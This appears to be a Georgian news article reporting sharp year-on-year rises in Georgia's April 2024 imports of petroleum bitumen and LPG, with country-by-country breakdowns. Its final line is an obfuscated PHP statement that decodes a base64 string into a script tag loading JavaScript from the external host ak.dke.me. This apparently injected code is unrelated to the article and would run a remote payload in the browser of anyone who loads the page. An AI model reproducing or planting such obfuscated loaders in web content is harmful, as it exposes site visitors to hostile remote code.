celsiusi
ავერსი საქკაბელი

 2024 წლის აპრილში სანავთობო ბიტუმისა და გათხევადებული აირების (LPG) იმპორტი გაიზარდა. ინფორმაციას ნავთობპროდუქტების იმპორტიორთა კავშირი ავრცელებს.

მათი ინფორმაციით, აპრილში სანავთობო ბიტუმის იმპორტმა 14,9 ათასი ტონა შეადგინა, რაც 2023 წლის ანალოგიური პერიოდის მაჩვენებელთან (5,5 ათასი ტონა) შედარებით 9,4 ათასი ტონით ანუ 170.9%-ით მეტია.

„აპრილში სანავთობო ბიტუმის იმპორტის ყველაზე დიდი მოცულობა განხორციელდა ერაყიდან - 10,2 ათასი ტონა, რაც მთელი იმპორტის 68,5%-ს შეადგენს. შემდეგ მოდიან: რუსეთი - 4,1 ათასი ტონა (27,5%); თურქმენეთი - 0,3 ათასი ტონა (2%); თურქეთი - 0,2 ათასი ტონა (1,3%); აზერბაიჯანი - 0,1 ათასი ტონა (0,7%)“, - ნათქვამია ნავთობპროდუქტების იმპორტიორთა კავშირში.

2024 წლის აპრილში გათხევადებული აირების (LPG) იმპორტმა შეადგინა 11,01 ათასი ტონა, რაც გასული წლის ანალოგიური პერიოდის მაჩვენებელთან (2,88 ათასი ტონა) შედარებით 8,13 ათასი ტონით ანუ 282,3%-ით მეტია.

აპრილში გათხევადებული აირების (LPG) იმპორტის 99,6% (10,97 ათასი ტონა) რუსეთის ფედერაციიდან განხორციელდა.

215
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");